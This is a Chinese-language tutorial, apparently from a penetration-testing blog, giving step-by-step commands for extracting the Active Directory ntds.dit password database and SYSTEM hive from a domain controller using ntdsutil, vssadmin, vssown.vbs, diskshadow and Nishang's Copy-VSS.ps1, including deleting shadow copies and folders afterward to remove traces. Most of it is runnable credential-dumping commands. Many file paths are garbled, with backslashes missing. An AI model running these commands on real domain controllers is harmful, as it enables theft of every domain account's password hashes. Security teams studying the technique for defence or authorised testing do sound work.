一、简介
通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:WindowsNTDS tds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。
在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot% tds tds.dit。ntds.dit中包含用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被操作系统锁定的。在一般情况下系统运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)。
二、实验
1.通过ntdsutil.exe提取ntds.dit
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
挂载快照
ntdsutil snapshot "mount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit
复制ntds.dit
copy C:$SNAP_201911241434_VOLUMEC$windowsNTDS
tds.dit c:
tds.dit
卸载快照
ntdsutil snapshot "unmount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit
删除快照
ntdsutil snapshot "delete {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit
2.利用vssadmin提取ntds.dit
创建C盘的卷影拷贝
vssadmin create shadow /for=c:
卷影副本 ID: {26133fdb-5645-4596-840f-aa3b88993628}
卷影副本卷名: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
在创建的卷影拷贝中将ntds.dit复制出来
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windows
tds
tds.dit c:
tds.dit
删除快照
vssadmin delete shadows /for=c: /quiet
3.利用vssown.vbs提取ntds.dit
上传cscript.exe和vssown.vbs到域服务器上,查找ntds.dit的位置。
reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSParameters //得到ntds的默认路径:c: WindowsNTDS
tds.dit
启动卷影拷贝服务 cscript //nologo vssown.vbs /start
创建一个C盘的卷影拷贝
cscript vssown.vbs /create c
列出当前卷影拷贝
cscript vssown.vbs /list
ID:{654734BE-EB3B-4C62-BE64-2CD7FB491BF4}
存储位置:\?GLOBALROOTDeviceHarddiskVolumeShadowCopy2
复制NTDS.dit
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsNTDS
tds.dit c:
tds.dit
删除卷影拷贝
cscript vssown.vbs /delete {654734BE-EB3B-4C62-BE64-2CD7FB491BF4}
4.使用diskshadow导出ndts.dit
可以使用diskshadow.exe来执行命令。例如,将需要执行的命令“exec c:windowssystemcalc.exe”写入c:command.txt文件。
echo exec c:windowssystem32calc.exe > command.txt
type command.txt
diskshadow /s command.txt # 使用diskshadow执行txt中的命令。
diskshadow也可以用来导出ntds.dit 。将如下命令写入一个文件中去执行。
set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" /c copy z:windows
tds
tds.dit c:
tds.dit delete shadows all
list shadows all reset
exit
使用diskshadow执行c:command.txt中的命令
diskshadow /s c:command.txt
注意:使用diskshadow时必须切换到windowssystem32目录下执行命令,否则会报错。
导出ntds.dit后,可以将system.hive转储。因为system.hive中存放着ntds.dit 的密钥,所以没有该密钥,将无法查看ntds.dit 中的信息。
reg save hklmsystem c:windows empsystem.hive
5.使用ntdsutil的IFM创建卷影拷贝
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q
然后将SYSTEM和SECURITY两项复制到c: est
egistry文件夹下
ntds.dit 已经被复制到c: estactive directory文件夹下了。
将ntds.dit拖回本地后,在目标机器上将test文件夹删除
rmdir /s/q c: est
在NiShang中有个powershell脚本Copy-VSS.ps1,将该脚本提取出来在域控制器中打开并运行。
Import-Module .Copy-VSS.ps1
Copy-VSS
通过该脚本,可以将SAM、SYSTEM、ntds.dit复制到与该脚本相同的目录中。